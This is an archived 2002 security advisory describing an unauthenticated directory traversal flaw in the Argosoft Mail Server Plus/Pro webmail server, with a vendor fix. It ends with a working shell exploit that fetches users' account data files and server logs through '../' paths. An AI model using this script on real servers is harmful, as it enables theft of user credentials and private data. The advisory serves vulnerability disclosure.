OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: nfinitygmx.net
Date: Wed Jul 03 2002 - 00:32:54 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Team N.finity Security Advisory
    03/07/2002

    Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal

    Summary
    ===================

        Argosoft Mail Server Pro contains a built-in HTTP server for
        webmail access. Without logging in, an attacker can do a
        reverse directory traversal to retrieve any file on the drive
        that System can read by specifying a series of "/.." after the
        path to the images of the webmail server or of the mail
        attachments for a valid user.

    Systems Affected
    ===================

        Any Windows system using the webmail feature of Argosoft Mail
        Server Plus / Pro <= 1.8.1.5

        The freeware edition of Argosoft Mail Server is not vulnerable.

    Impact
    ===================

        An attacker can retrieve any file on the disk readable by
        the mail server. The filename and relative path needs to be
        specified, as directory listings are not generated. Executable
        files are also not run as this is not supported by the webmail.

    Explanation
    ===================

        Argosoft Mail Server comes in three versions: Freeware, Plus,
        and Pro. The Plus and Pro versions come with a build-in web
        server to provide simple Webmail access to users' mail.

        The webmail server does not check for reverse directory
        traversal. This allows an attacker to exploit the images or
        attachments directory to list the contents of files on the
        drive.

        Also, normally, a user will have to log into Argosoft Mail
        Server Pro's webmail in order to read his mail and attachments.
        However, it allows non-authenticated users to retrieve files
        via the attachments URL, as long as a valid path is specified.
        This can be exploited to retrieve the attachments of users in
        certain conditions, or can also be reverse traversed.

        While the attachments folder is deleted once the user logs out
        of the webmail or after 20 minutes of inactivity, this exploit
        will work even if the attachments folder is not present.

    Solution
    ===================

        The vendor has released a new version at
        http://www.argosoft.com/applications/mailserver/

    Acknowledgments
    ===================

        Vulnerability discovery, exploit code, and advisory by Mayhem
        of Team N.finity.

    Contact Information
    ===================

        Team N.finity can be reached by mailing to
        nfinitygmx.net.

    References
    ===================

        [1] Team N.finity
        http://nfinity.yoll.net/

    Disclaimer
    ===================

        This advisory does not claim to be complete or to be usable for
        any purpose. Information about the vulnerable systems may be
        inaccurate or wrong. Any supplied exploits are not to be used
        for malicious purposes, but for educational purposes only.

        This advisory is free for open distribution in unmodified form.
        Articles that are based on information from this advisory
        should include link [1].

    Exploit Code
    ===================

    #!/bin/sh
    #
    # released on 06/07/2002 by team n.finity <nfinitygmx.net>
    # find us at http://nfinity.yoll.net/
    #
    # argospill.sh

    HOST=$1
    USER=$2
    DOMAIN=$3

    startpro()
    {
        echo -e "\nSpilling user $USER $DOMAIN, host $HOST (Pro)\n"
        URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
        /usr/bin/lynx -dump http://$HOST$URL
    }

    startplus()
    {
        echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
        URL=/$USER/_tempatt/../userdata.rec
        /usr/bin/lynx -dump http://$HOST$URL
    }

    startboth()
    {
        echo -e "\nSpilling host $HOST (Plus / Pro)\n"
        URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
        /usr/bin/lynx -dump http://$HOST$URL
    }

    usage()
    {
        echo -e "\nUsage:\n"
        echo "Both - $0 <host>"
        echo "Pro - $0 <host> <user> <domain>"
        echo "Plus - $0 <host> <user>"
        echo -e "\nExample:\n"
        echo "Both, images dir - $0 www.test.com"
        echo "Plus, no dom req - $0 www.test.com me"
        echo "Pro, default dom - $0 www.test.com me _nodomain"
        echo "Pro, virtual dom - $0 www.test.com me test.com"
    }

    echo "Argospill 1.0 by Team N.finity"

    if [ -n "$HOST" ]; then
        if [ -n "$USER" ]; then
            if [ -n "$DOMAIN" ]; then
                startpro
            else
                startplus
            fi
        else
            startboth
        fi
    else
        usage
    fi